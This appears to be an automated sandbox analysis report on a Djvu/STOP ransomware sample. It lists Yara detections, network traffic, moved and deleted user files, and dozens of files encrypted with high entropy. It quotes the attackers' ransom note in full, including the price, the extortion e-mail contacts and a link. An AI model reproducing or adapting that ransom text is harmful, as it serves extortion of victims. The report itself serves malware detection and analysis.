                  Source: Ln0LqSBLhS.exe, 00000006.00000003.290651840.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: function Ae(a){return new Promise(function(b){var c=document.createElement("script");c.src="https://www.youtube.com/iframe_api";var d=document.getElementsByTagName("script")[0];d.parentNode.insertBefore(c,d);window.onYouTubeIframeAPIReady=function(){a.c=Be(a,a.l,a.g,b)}})}f.fb=function(a){if(!this.h)return!1;if(27===a.keyCode||"Escape"===a.key||"Esc"===a.key)return this.close(),!0};var Ce={AnchorArrow:vb,AnimatedSvg:yb,AnimatedTabs:Cb,AnimationTrigger:Lb,Carousel:Nb,Collapsible:Rb,ContentSwitcherTab:Sb,ContentToggle:qc,CookieBanner:vc,EnvironmentDetect:Bc,ExpandableField:Cc,Footer:Fc,Form:Tc,Header:kd,HeroSwitcher:vd,LazyLoader:xd,Popup:Y,ReplaySubanimations:zd,Scrollable:Ad,SearchBar:Ed,Slider:Pd,Survey:Wd,Tabs:Yd,ThemeImages:Z,ThemeToggle:fe,TrackedSection:ie,TranslateShowcase:me,VideoModal:xe},De=null;function Ee(){De||(De=this,Fe());return De} equals www.youtube.com (Youtube)
                  Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49712 version: TLS 1.2
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,6_2_004822E0
                  Source: Ln0LqSBLhS.exe, 00000002.00000002.235701155.00000000020AB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  Spam, unwanted Advertisements and Ransom Demands:

                  barindex
                  Found ransom note / readmeShow sources
                  Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-VCW326HODaPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:manager@mailtemp.chReserve e-mail address to contact us:managerhelper@airmail.ccYour personal ID:0330gDrgo5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCBJump to dropped file
                  Yara detected Djvu RansomwareShow sources
                  Source: Yara matchFile source: 6.1.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.1.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.Ln0LqSBLhS.exe.3c115a0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.1.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Ln0LqSBLhS.exe.3b215a0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Ln0LqSBLhS.exe.3b215a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Ln0LqSBLhS.exe.3c415a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.Ln0LqSBLhS.exe.3c115a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Ln0LqSBLhS.exe.3c415a0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.1.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.1.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.1.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000001.234275088.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.248521541.0000000003C10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000001.247371622.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Ln0LqSBLhS.exe PID: 6484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Ln0LqSBLhS.exe PID: 6536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Ln0LqSBLhS.exe PID: 6632, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Ln0LqSBLhS.exe PID: 6664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Ln0LqSBLhS.exe PID: 6672, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Ln0LqSBLhS.exe PID: 6780, type: MEMORYSTR
                  Modifies existing user documents (likely ransomware behavior)Show sources
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile moved: C:\Users\user\Desktop\EOWRVPQCCS.jpgJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile deleted: C:\Users\user\Desktop\EOWRVPQCCS.jpgJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile moved: C:\Users\user\Desktop\PALRGUCVEH\TQDFJHPUIU.pngJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile deleted: C:\Users\user\Desktop\PALRGUCVEH\TQDFJHPUIU.pngJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile moved: C:\Users\user\Desktop\EOWRVPQCCS.xlsxJump to behavior
                  Writes many files with high entropyShow sources
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe entropy: 7.99880799193Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Temp\chrome_installer.log entropy: 7.99157422112Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Temp\SetupExe(202007230953501D8).log entropy: 7.99890888568Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl entropy: 7.9945159915Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol entropy: 7.99906732422Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx entropy: 7.9987921799Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs entropy: 7.99885906438Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs entropy: 7.99886163126Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx entropy: 7.99881469911Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99733418253Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT entropy: 7.99595018325Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Temp\CR_8F2A8.tmp\setup.exe entropy: 7.99873096846Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT entropy: 7.99622355643Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat entropy: 7.99844797857Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl entropy: 7.99903161835Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL entropy: 7.99883456221Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL entropy: 7.99875002603Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL entropy: 7.99882036988Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL entropy: 7.9989944499Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl entropy: 7.99874673184Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl entropy: 7.99873315536Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL entropy: 7.99875625678Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL entropy: 7.9988195873Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl entropy: 7.99885371468Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL entropy: 7.99880301134Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL entropy: 7.99869179775Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.99891226707Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat entropy: 7.99899410563Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.99716526689Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma entropy: 7.99871731328Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma entropy: 7.99876990347Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\en-US.1 entropy: 7.99110856058Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml entropy: 7.99870704592Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin entropy: 7.99519656282Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin entropy: 7.99871092252Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{1451C5E2-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db entropy: 7.99869114602Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db entropy: 7.99847881821Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000018.db entropy: 7.99821760278Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000019.db entropy: 7.99823081558Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000006.db entropy: 7.99812680849Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db entropy: 7.99845813245Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl entropy: 7.99880856812Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99859165542Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V010000A.log entropy: 7.99896848642Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V010000B.log entropy: 7.99881428864Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V010000C.log entropy: 7.99877488296Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00001.jrs entropy: 7.99883025917Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00002.jrs entropy: 7.99887197064Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl entropy: 7.99281350965Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99905027511Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99805406465Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99716790756Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99364776516Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal entropy: 7.99887912007Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99670844587Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99560052451Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99704784972Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2[1].js entropy: 7.99879280071Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJnA2[1].js entropy: 7.99399529003Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\PreSignInSettingsConfig[1].json entropy: 7.99440144414Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\suggestions[1].en-US entropy: 7.99089007368Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\l1[1].dat entropy: 7.99523940636Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2[1].css entropy: 7.99817044302Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\iecompatviewlist[1].xml entropy: 7.99889138738Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx entropy: 7.99886951625Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.99764138277Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749CFD-12B4.pma entropy: 7.99878462798Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749DC8-E1C.pma entropy: 7.9987726497Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99869554083Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store entropy: 7.99878622802Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlBilling.store entropy: 7.99028322924Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdDownloadWhitelist.store entropy: 7.99464336971Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlHighConfidenceAllowlist.store entropy: 7.99872446635Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store entropy: 7.99883503892Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalware.store entropy: 7.99822090908Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store entropy: 7.99888043723Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store entropy: 7.99852505772Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlUws.store entropy: 7.99749532474Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat entropy: 7.99158278212Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\{C10454D4-032C-11EB-90E3-ECF4BB862DED}.dat entropy: 7.99134858907Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\{C10454D5-032C-11EB-90E3-ECF4BB862DED}.dat entropy: 7.99880501015Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-22_195254_5092-5000.log entropy: 7.99385085483Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-23_165240_5300-5304.log entropy: 7.99519691539Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_102023_cd4-fc0.log entropy: 7.99883613703Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_172258_392-396.log entropy: 7.99869232798Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2020-07-23_165335_5620-5612.log entropy: 7.99881823223Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_102023_125c-c90.log entropy: 7.99806715031Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_172244_4980-3048.log entropy: 7.9945457857Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2020-07-23_165322_5816-5812.log entropy: 7.99502564575Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session entropy: 7.99116919724Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-07-27_071441_17bc-17b8.log entropy: 7.99849692151Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-09-30_080200_1598-1674.log entropy: 7.99781509721Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-07-27_071441_12fc-160c.log entropy: 7.99816343708Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-09-30_080200_fb8-16ac.log entropy: 7.99799324121Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-07-27_071441_bc8-bd0.log entropy: 7.99795474875Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-09-30_080159_c40-12d4.log entropy: 7.99797080591Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_172300_6208-6360.log entropy: 7.9911137957Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session entropy: 7.99080860643Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl entropy: 7.9969390144Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 entropy: 7.99738370042Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl entropy: 7.99861463881Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 entropy: 7.99779193613Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl entropy: 7.99860931954Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 entropy: 7.99725418698Jump to dropped file
